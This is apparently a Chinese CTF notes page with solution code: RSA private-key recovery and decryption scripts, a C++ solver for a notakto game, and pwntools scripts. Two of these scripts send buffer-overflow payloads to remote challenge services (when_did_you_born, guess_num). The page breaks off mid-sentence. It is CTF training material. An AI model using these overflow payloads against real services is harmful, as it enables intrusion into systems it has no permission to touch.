# CTF Crypto RSA

python代码：

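 # RSA private-exponent calculator: reads the primes p and q and the public exponent e, prints n and d.
# Recovering d this way is only possible because the factors of n are known.


def CPPDiv(a, b):
    """Return a / b truncated toward zero, like C/C++ integer division.

    Pure integer arithmetic is used instead of int(a / b): float division
    loses precision (or overflows) on RSA-sized operands and silently yields
    a wrong quotient.
    """
    quotient = abs(a) // abs(b)
    return quotient if (a < 0) == (b < 0) else -quotient


def CPPMod(a, b):
    """Return the remainder matching CPPDiv (takes the sign of a, as in C/C++)."""
    return a - b * CPPDiv(a, b)


def ExGCD(a, b, x, y):
    """Extended Euclid: return (g, s, t) such that a*s + b*t == g.

    x and y are never read; they are kept only so existing callers that pass
    four arguments keep working. The loop is iterative so that large operands
    cannot exhaust Python's recursion limit.
    """
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r != 0:
        q = CPPDiv(old_r, r)
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        old_t, t = t, old_t - q * t
    return old_r, old_s, old_t


def ExGCD_Cal(a, b):
    """Return only the Bezout coefficients (s, t) for |a| and |b|."""
    return ExGCD(abs(a), abs(b), 0, 0)[1:]


def QuickPow(a, b, MOD):
    """Return a**b mod MOD by square-and-multiply.

    Raises:
        ValueError: if b is negative (the original recursion never terminated).
    """
    if b < 0:
        raise ValueError("exponent must be non-negative")
    result = 1 % MOD  # so that MOD == 1 yields 0
    base = a % MOD
    while b > 0:
        if b & 1:
            result = result * base % MOD
        base = base * base % MOD
        b >>= 1
    return result


def solveRSAd(n, phi, e):
    """Return the private exponent d with (d * e) % phi == 1 and 0 <= d < phi.

    n is accepted for interface compatibility and is not used.

    Raises:
        ValueError: if phi is not positive or e has no inverse modulo phi.
    """
    if phi <= 0:
        raise ValueError("phi must be positive")
    g, u, _ = ExGCD(abs(e), phi, 0, 0)
    if g != 1:
        # Without this check a non-invertible e would produce a bogus d.
        raise ValueError("e and phi are not coprime; no private exponent exists")
    return u % phi


def Main():
    """Prompt for p, q and e, then print the modulus and the private exponent."""
    p = int(input("Prime p:"))
    q = int(input("Prime q:"))
    phi = (p - 1) * (q - 1)
    n = p * q
    print("Mod N: %d" % n)
    e = int(input("Public Key e:"))
    d = solveRSAd(n, phi, e)
    print("Private Key d: %s" % d)


if __name__ == '__main__':
    Main()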

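 # RSA helper: derives d from the known primes p, q and exponent e, then decrypts one ciphertext c.
# This is textbook RSA with no padding, and it works only because the factors of n are known.


def CPPDiv(a, b):
    """Return a / b truncated toward zero, like C/C++ integer division.

    Pure integer arithmetic is used instead of int(a / b): float division
    loses precision (or overflows) on RSA-sized operands and silently yields
    a wrong quotient.
    """
    quotient = abs(a) // abs(b)
    return quotient if (a < 0) == (b < 0) else -quotient


def CPPMod(a, b):
    """Return the remainder matching CPPDiv (takes the sign of a, as in C/C++)."""
    return a - b * CPPDiv(a, b)


def ExGCD(a, b, x, y):
    """Extended Euclid: return (g, s, t) such that a*s + b*t == g.

    x and y are never read; they are kept only so existing callers that pass
    four arguments keep working. The loop is iterative so that large operands
    cannot exhaust Python's recursion limit.
    """
    old_r, r = a, b
    old_s, s = 1, 0
    old_t, t = 0, 1
    while r != 0:
        q = CPPDiv(old_r, r)
        old_r, r = r, old_r - q * r
        old_s, s = s, old_s - q * s
        old_t, t = t, old_t - q * t
    return old_r, old_s, old_t


def ExGCD_Cal(a, b):
    """Return only the Bezout coefficients (s, t) for |a| and |b|."""
    return ExGCD(abs(a), abs(b), 0, 0)[1:]


def QuickPow(a, b, MOD):
    """Return a**b mod MOD by square-and-multiply.

    Raises:
        ValueError: if b is negative (the original recursion never terminated).
    """
    if b < 0:
        raise ValueError("exponent must be non-negative")
    result = 1 % MOD  # so that MOD == 1 yields 0
    base = a % MOD
    while b > 0:
        if b & 1:
            result = result * base % MOD
        base = base * base % MOD
        b >>= 1
    return result


def solveRSAd(n, phi, e):
    """Return the private exponent d with (d * e) % phi == 1 and 0 <= d < phi.

    n is accepted for interface compatibility and is not used.

    Raises:
        ValueError: if phi is not positive or e has no inverse modulo phi.
    """
    if phi <= 0:
        raise ValueError("phi must be positive")
    g, u, _ = ExGCD(abs(e), phi, 0, 0)
    if g != 1:
        # Without this check a non-invertible e would produce a bogus d.
        raise ValueError("e and phi are not coprime; no private exponent exists")
    return u % phi


def Main():
    """Prompt for p, q, e and a ciphertext; print n, d and the plaintext in hex."""
    p = int(input("Prime p:"))
    q = int(input("Prime q:"))
    phi = (p - 1) * (q - 1)
    n = p * q
    print("Mod N: %d" % n)
    e = int(input("Public Key e:"))
    d = solveRSAd(n, phi, e)
    print("Private Key d: %s" % d)
    c = int(input("Cipher c:"))
    # The built-in three-argument pow performs the modular exponentiation m = c^d mod n.
    m = pow(c, d, n)
    print("Plain m: %s" % str(hex(m)))


if __name__ == '__main__':
    Main()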

https://www.freebuf.com/sectool/163781.html

# BJD CTF Programming notakto_1

C++有漏洞，够用就行：

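 // Enumerates move sequences on a single 3x3 board, starting from the centre cell (index 4).
// A move is only followed when it does not complete a row, column or diagonal.
#include <iostream>
// NOTE: the page lists a second #include whose header name was lost when the
// listing was extracted; nothing below needs more than <iostream>.
using namespace std;

// process[k] is the cell chosen at move k; move 0 is fixed to the centre.
int process[10] = { 4 };
// visited[c] is true while cell c (0..8, row-major) is occupied.
bool visited[10];

// Map (row, column) to the row-major cell index.
inline int cal(int x, int y) {
    return x * 3 + y;
}

// Reference to the occupancy flag of cell (x, y).
bool& vis(int x, int y) {
    return visited[cal(x, y)];
}

// True when the line(s) through (x, y) are fully occupied: its column, its row,
// and whichever diagonals pass through it.
bool check(int x, int y) {
    bool flag = false;
    flag |= vis(0, y) & vis(1, y) & vis(2, y);
    flag |= vis(x, 0) & vis(x, 1) & vis(x, 2);
    if (x == y) flag |= vis(0, 0) & vis(1, 1) & vis(2, 2);
    if (x + y == 2) flag |= vis(0, 2) & vis(1, 1) & vis(2, 0);
    return flag;
}

// Print process[0..n] inclusive as one line of digits.
void print(int n) {
    for (int i = 0; i <= n; i++) {
        cout << process[i];
    }
    cout << endl;
}

// Try every free cell at move `step`. Cells that do not complete a line are
// explored further. When no such cell exists and `step` is odd, the sequence is
// printed; process[step] then still holds the last cell tried at this depth,
// i.e. a line-completing move.
// NOTE(review): odd steps are presumably the opponent's turns, so the output
// lists positions in which the opponent is forced to finish a line; confirm
// against the challenge rules.
void dfs(int step) {
    bool flag = true;
    for (int i = 0; i < 9; i++) {
        if (visited[i]) continue;
        visited[i] = true;
        process[step] = i;
        if (check(i / 3, i % 3) == 0) {
            dfs(step + 1);
            flag = false;
        }
        visited[i] = false;
    }
    if (flag && step % 2 == 1) print(step);
}

int main() {
    visited[4] = true;  // matches process[0] == 4
    dfs(1);
}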

python连带着往外发socket麻烦得很：

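 # Plays 150 rounds against the remote game service, choosing each move from a precomputed list.
# Every line of situation.txt is one move sequence (one digit per move).
# NOTE(review): situation.txt is presumably the output of a separate solver; confirm.
from pwn import *

sock = remote("222.186.56.247", 8122)
wordList = []
currentWord = ""


def findNewWord():
    """Return the first stored sequence that starts with the moves played so far.

    Raises:
        Exception: if no stored sequence matches the current prefix.
    """
    global currentWord, wordList
    for elem in wordList:
        if elem[0:len(currentWord)] == currentWord:
            return elem
    raise Exception("Error:Word Not found!")


def loadDic():
    """Load the move sequences from situation.txt into wordList."""
    global wordList
    with open("situation.txt", "r") as f:
        # Drop line endings and blank lines so that no entry can hand a
        # newline character to the move-sending code.
        wordList = [line.strip() for line in f if line.strip()]


def getIntfromSock(sock):
    """Read the digit the service prints after "My move: " and return it as an int."""
    sock.recvuntil(b"My move: ")
    x = sock.recv(1)
    # The service sometimes emits one extra space before the digit.
    if x == b' ':
        x = sock.recv(1)
    return int(x)


def payGame(i):
    """Play round i: alternate our move and the service's reply until five moves are recorded."""
    global currentWord, wordList, sock
    print("the ith:", i)
    currentWord = ""
    while len(currentWord) < 5:
        backupWord = findNewWord()
        move = backupWord[len(currentWord)]
        print("Send:", move)
        # pwntools expects bytes; passing str only works through an implicit
        # ASCII conversion that emits a BytesWarning on Python 3.
        sock.sendline(str(move).encode())
        currentWord += move
        if len(currentWord) == 5:
            print("break")
            break
        currentWord += str(getIntfromSock(sock))
        print("currentWord", currentWord)
    sock.recvuntil(b"win!")


loadDic()
for i in range(150):
    payGame(i)
sock.interactive()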

# ADWorld Pwn when_did_you_born

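 # Answers the two prompts of the when_did_you_born challenge service.
from pwn import *

p = remote("111.198.29.45", 36585)

# pwntools works on bytes; str arguments are converted with a BytesWarning on
# Python 3, so the prompts and answers are given as bytes throughout.
p.sendlineafter(b"Birth?", b"0")

# Eight filler bytes followed by 1926 packed as a 4-byte integer by p32.
# NOTE(review): presumably the service reads the name without a length bound,
# so the bytes after the first eight land in an adjacent variable; a bounded
# read in the target would prevent that. Confirm against the binary.
payload = b"0" * 0x8 + p32(1926)
print(len(payload))
p.sendlineafter(b"Name?", payload)
p.interactive()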

# ADWorld Pwn guess_num

Pwn代码如下

 # Sends one line of 0x24 ASCII '0' characters to the guess_num service, then hands over the terminal.
from pwn import *

conn = remote("111.198.29.45", 44610)

# NOTE(review): the length 0x24 presumably spans the input buffer plus a value
# stored after it in the target; the page does not show the binary, so confirm.
filler = "0" * 0x24
conn.sendline(bytearray(filler, "utf-8"))
conn.interactive()

base64解码得